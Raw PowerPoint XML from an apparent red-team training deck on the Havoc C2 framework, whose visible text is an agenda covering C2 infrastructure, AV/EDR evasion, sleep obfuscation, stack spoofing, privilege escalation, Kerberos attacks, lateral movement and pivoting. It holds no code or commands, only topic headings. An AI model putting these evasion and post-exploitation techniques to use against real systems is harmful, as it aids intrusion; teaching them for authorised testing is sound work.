        <p:spPr>
          <a:xfrm>
            <a:off x="5913834" y="933422"/>
            <a:ext cx="4400918" cy="55978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C506B-01A0-6C35-5F8F-7D3FA77C0B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466"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1303794" y="933422"/>
            <a:ext cx="4241235" cy="5607818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B5D1581B-A756-DE38-27CC-46640DC9C94C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461AB03B-9272-D119-E611-850ABD00B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17211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Sleep Obfuscation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2957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6902A-9690-E6D4-3368-E44776166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11506"/>
            <a:ext cx="4373743" cy="5660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BE0C8-23B8-2232-C3FA-62936EF0D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262" y="911506"/>
            <a:ext cx="4373743" cy="5688724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49E742DF-6564-A91B-2F67-CB4CDF563AE8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39D3A398-2C68-C6EB-68BB-723F5A7118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2311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Thread Stack Spoofing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2443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795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4D57345-130E-2A39-EAEC-AD459B040C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1588" y="6030301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652FB6E6-8019-913B-D8D3-50939F39827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1588" y="6182701"/>
            <a:ext cx="101519" cy="101519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E897464F-8536-918F-4B5F-8FC4C64B63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1588" y="5877901"/>
            <a:ext cx="101519" cy="101519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871903FB-2501-288B-FE36-31AEDBF33F5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21507" y="5725421"/>
            <a:ext cx="101599" cy="101599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C7F6EA2D-CA84-111D-5327-6152F1032F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687920" y="2664287"/>
            <a:ext cx="9095595" cy="801501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467" marR="3387" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="970"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US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Agenda</a:t>
            </a:r>
            <a:endParaRPr sz="66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DBC197D-8979-4AC6-E1F4-0418BD2487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53" y="5614824"/>
            <a:ext cx="729192" cy="729192"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E55D9E68-FBC7-807D-ED8B-58B5AD0EAE23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7" name="Google Shape;1208;p26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6B5AC1A-DCE3-C9D8-7C6F-EF5225B2F3A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2464553" y="1793598"/>
            <a:ext cx="2967000" cy="2967000"/>
            <a:chOff x="1436600" y="1347425"/>
            <a:chExt cx="2967000" cy="2967000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Google Shape;1209;p26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02D53A3B-68AE-ED1B-F3F6-0A63040872FA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1436600" y="1347425"/>
              <a:ext cx="2967000" cy="2967000"/>
            </a:xfrm>
            <a:prstGeom prst="arc">
              <a:avLst>
                <a:gd name="adj1" fmla="val 17813811"/>
                <a:gd name="adj2" fmla="val 3845812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10;p26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFFF07C3-F45C-C565-A840-932F31F9D76B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2082846" y="1993559"/>
              <a:ext cx="1674508" cy="1674508"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="95156" h="95156" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="47578" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="21301" y="1"/>
                    <a:pt x="1" y="21301"/>
                    <a:pt x="1" y="47578"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="73855"/>
                    <a:pt x="21301" y="95155"/>
                    <a:pt x="47578" y="95155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73855" y="95155"/>
                    <a:pt x="95156" y="73855"/>
                    <a:pt x="95156" y="47578"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="95156" y="21301"/>
                    <a:pt x="73855" y="1"/>
                    <a:pt x="4757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20" name="Google Shape;1211;p26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B8DF99D-5BAF-CC51-0E58-0D24EC928205}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2155031" y="2065717"/>
              <a:ext cx="1530138" cy="1530190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BA121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657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21" name="Google Shape;1212;p26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFC5800E-ABD6-CC1A-A87D-518F16A353FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2503831" y="2495918"/>
              <a:ext cx="844435" cy="676185"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="11967" h="9809" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="8309" y="358"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="8940" y="358"/>
                    <a:pt x="9663" y="469"/>
                    <a:pt x="10418" y="796"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="10418" y="7796"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="9723" y="7513"/>
                    <a:pt x="8997" y="7381"/>
                    <a:pt x="8289" y="7381"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7542" y="7381"/>
                    <a:pt x="6816" y="7527"/>
                    <a:pt x="6168" y="7796"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="6168" y="796"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="6430" y="676"/>
                    <a:pt x="7238" y="358"/>
                    <a:pt x="8309" y="358"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3700" y="358"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="4458" y="358"/>
                    <a:pt x="5191" y="513"/>
                    <a:pt x="5823" y="796"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5811" y="1677"/>
                    <a:pt x="5811" y="6761"/>
                    <a:pt x="5811" y="7796"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5418" y="7642"/>
                    <a:pt x="4656" y="7392"/>
                    <a:pt x="3668" y="7392"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2929" y="7392"/>
                    <a:pt x="2215" y="7523"/>
                    <a:pt x="1548" y="7808"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1548" y="3867"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1548" y="3760"/>
                    <a:pt x="1477" y="3689"/>
                    <a:pt x="1370" y="3689"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1262" y="3689"/>
                    <a:pt x="1191" y="3760"/>
                    <a:pt x="1191" y="3867"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1191" y="7987"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1191" y="8118"/>
                    <a:pt x="1298" y="8225"/>
                    <a:pt x="1429" y="8225"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1465" y="8225"/>
                    <a:pt x="1489" y="8225"/>
                    <a:pt x="1524" y="8213"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2203" y="7916"/>
                    <a:pt x="2917" y="7761"/>
                    <a:pt x="3656" y="7761"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4715" y="7761"/>
                    <a:pt x="5537" y="8070"/>
                    <a:pt x="5799" y="8189"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="5799" y="8606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="417" y="8606"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="381" y="8606"/>
                    <a:pt x="358" y="8582"/>
                    <a:pt x="358" y="8547"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="358" y="1248"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="358" y="1212"/>
                    <a:pt x="381" y="1188"/>
                    <a:pt x="417" y="1188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1203" y="1188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1203" y="3153"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1203" y="3248"/>
                    <a:pt x="1274" y="3332"/>
                    <a:pt x="1382" y="3332"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1489" y="3332"/>
                    <a:pt x="1560" y="3248"/>
                    <a:pt x="1560" y="3153"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1560" y="796"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2253" y="495"/>
                    <a:pt x="2987" y="358"/>
                    <a:pt x="3700" y="358"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="6608" y="7987"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6608" y="9249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6501" y="9166"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="6471" y="9136"/>
                    <a:pt x="6430" y="9121"/>
                    <a:pt x="6390" y="9121"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6349" y="9121"/>
                    <a:pt x="6311" y="9136"/>
                    <a:pt x="6287" y="9166"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="6168" y="9261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6168" y="8166"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="6251" y="8118"/>
                    <a:pt x="6418" y="8058"/>
                    <a:pt x="6608" y="7987"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="8273" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="7438" y="0"/>
                    <a:pt x="6643" y="178"/>
                    <a:pt x="5989" y="486"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5715" y="367"/>
                    <a:pt x="4858" y="10"/>
                    <a:pt x="3668" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2858" y="10"/>
                    <a:pt x="2072" y="176"/>
                    <a:pt x="1322" y="510"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1143" y="593"/>
                    <a:pt x="1191" y="796"/>
                    <a:pt x="1191" y="843"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="405" y="843"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="843"/>
                    <a:pt x="0" y="1022"/>
                    <a:pt x="0" y="1248"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="8535"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="8761"/>
                    <a:pt x="179" y="8939"/>
                    <a:pt x="405" y="8939"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="5811" y="8939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5811" y="9630"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="5811" y="9740"/>
                    <a:pt x="5889" y="9808"/>
                    <a:pt x="5977" y="9808"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6013" y="9808"/>
                    <a:pt x="6050" y="9797"/>
                    <a:pt x="6084" y="9773"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="6382" y="9535"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="6656" y="9737"/>
                    <a:pt x="6668" y="9809"/>
                    <a:pt x="6787" y="9809"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6894" y="9809"/>
                    <a:pt x="6966" y="9737"/>
                    <a:pt x="6966" y="9630"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="6966" y="8939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9335" y="8939"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="9442" y="8939"/>
                    <a:pt x="9513" y="8856"/>
                    <a:pt x="9513" y="8761"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9513" y="8654"/>
                    <a:pt x="9442" y="8582"/>
                    <a:pt x="9335" y="8582"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="6966" y="8582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6966" y="7892"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="7400" y="7783"/>
                    <a:pt x="7847" y="7728"/>
                    <a:pt x="8295" y="7728"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9025" y="7728"/>
                    <a:pt x="9760" y="7875"/>
                    <a:pt x="10454" y="8177"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10483" y="8192"/>
                    <a:pt x="10514" y="8199"/>
                    <a:pt x="10544" y="8199"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10662" y="8199"/>
                    <a:pt x="10776" y="8096"/>
                    <a:pt x="10776" y="7963"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="10776" y="1177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11561" y="1177"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="11597" y="1177"/>
                    <a:pt x="11621" y="1212"/>
                    <a:pt x="11621" y="1236"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="11621" y="8535"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="11621" y="8570"/>
                    <a:pt x="11597" y="8594"/>
                    <a:pt x="11561" y="8594"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="10049" y="8594"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="9942" y="8594"/>
                    <a:pt x="9871" y="8666"/>
                    <a:pt x="9871" y="8773"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9871" y="8880"/>
                    <a:pt x="9942" y="8951"/>
                    <a:pt x="10049" y="8951"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="11561" y="8951"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="11788" y="8951"/>
                    <a:pt x="11966" y="8773"/>
                    <a:pt x="11966" y="8547"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="11966" y="1236"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="11954" y="998"/>
                    <a:pt x="11776" y="831"/>
                    <a:pt x="11549" y="831"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="10764" y="831"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="10752" y="784"/>
                    <a:pt x="10811" y="581"/>
                    <a:pt x="10633" y="498"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9864" y="154"/>
                    <a:pt x="9051" y="0"/>
                    <a:pt x="8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214;p26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CFE3B5E-6E5C-0E84-7CED-3E92F7F620DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4315481" y="605459"/>
            <a:ext cx="5169178" cy="1635355"/>
            <a:chOff x="3287528" y="159286"/>
            <a:chExt cx="5169178" cy="1635355"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Google Shape;1215;p26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{790AF002-1BCF-CAC9-3CA9-EFBCBABAC942}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3287528" y="1193159"/>
              <a:ext cx="601462" cy="60148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24" name="Google Shape;1216;p26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3F0D520-F059-C696-ED19-C4E411F35E85}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4403600" y="159286"/>
              <a:ext cx="4053106" cy="1123265"/>
              <a:chOff x="5293558" y="2641861"/>
              <a:chExt cx="5003835" cy="1123265"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="26" name="Google Shape;1217;p26">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A9027E3-8495-1C29-98AC-F2930206230B}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5682327" y="3399426"/>
                <a:ext cx="4615066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Basic Functionalities of Havoc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Malleable C2 Profile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C2 Infrastructure Design</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="27" name="Google Shape;1218;p26">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{563470C1-4990-C973-72DE-9C7EE4983F16}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5293558" y="2641861"/>
                <a:ext cx="4722609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8467" marR="3387">
                  <a:spcBef>
                    <a:spcPts val="970"/>
                  </a:spcBef>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" b="1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Chapter 1: Intro to C2</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Google Shape;1219;p26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF01CCE0-C409-117B-1D8A-47C07A11DE92}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3319075" y="1224713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oogle Shape;1232;p26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C425FF4-43DF-729D-A9AE-FA5972282213}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5099665" y="2474651"/>
            <a:ext cx="5604193" cy="1129241"/>
            <a:chOff x="3833488" y="1373058"/>
            <a:chExt cx="5604193" cy="1129241"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="Google Shape;1233;p26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42F6501D-2CC0-80C0-4B95-51CA81C2626C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3833488" y="1819113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42" name="Google Shape;1234;p26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E23DC706-AE0B-1D56-71EC-B73018713B60}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4853974" y="1373058"/>
              <a:ext cx="4583707" cy="1129241"/>
              <a:chOff x="5175563" y="3229677"/>
              <a:chExt cx="5658897" cy="1129241"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="44" name="Google Shape;1235;p26">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE17B03D-5989-737D-4123-8E12F5CD1BDA}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5530531" y="3993218"/>
                <a:ext cx="5303929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Built-In Evasion Mechanism of Havoc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AV Evasion &amp; EDR Bypass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Post-Exploitation Defense Evasion</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="45" name="Google Shape;1236;p26">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94B211C3-D5B2-111E-4DDB-04C52AB4F9CD}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5175563" y="3229677"/>
                <a:ext cx="5072497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8467" marR="3387">
                  <a:spcBef>
                    <a:spcPts val="970"/>
                  </a:spcBef>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="2400" b="1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Chapter 2: OPSEC &amp; Evasion</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="Google Shape;1237;p26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F419B59C-85C4-C894-4DCD-620B46392C27}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3865050" y="185065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oogle Shape;1238;p26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76AA3490-4DC0-95FE-61B6-00455326EE4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4474998" y="4222433"/>
            <a:ext cx="5624720" cy="1368515"/>
            <a:chOff x="4082798" y="2530216"/>
            <a:chExt cx="5624720" cy="1368515"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="Google Shape;1239;p26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{222B71E7-50EA-4D62-7AB0-26E95F83F589}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4082798" y="2530216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98" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="6537" y="1"/>
                    <a:pt x="1" y="6525"/>
                    <a:pt x="1" y="14586"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="22646"/>
                    <a:pt x="6537" y="29183"/>
                    <a:pt x="14598" y="29183"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22646" y="29183"/>
                    <a:pt x="29183" y="22646"/>
                    <a:pt x="29183" y="14586"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29183" y="6525"/>
                    <a:pt x="22646" y="1"/>
                    <a:pt x="1459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48" name="Google Shape;1240;p26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E046880B-1C3C-E89F-AF5C-24EE634460AB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5097145" y="2574923"/>
              <a:ext cx="4610373" cy="1323808"/>
              <a:chOff x="5167998" y="3720454"/>
              <a:chExt cx="5691819" cy="1323808"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="50" name="Google Shape;1241;p26">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDED74A4-0B2E-1738-EE5E-F8289B41BB89}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5553959" y="4678562"/>
                <a:ext cx="4184987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Local Privilege Escalation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Kerberos Attacks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Lateral Movement</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr marL="294217" marR="3387" indent="-285750">
                  <a:spcBef>
                    <a:spcPts val="970"/>
                  </a:spcBef>
                  <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:buChar char="•"/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US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Pivoting</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="51" name="Google Shape;1242;p26">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BC600BA-1A97-5246-6649-0B2F1B31B0FE}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5167998" y="3720454"/>
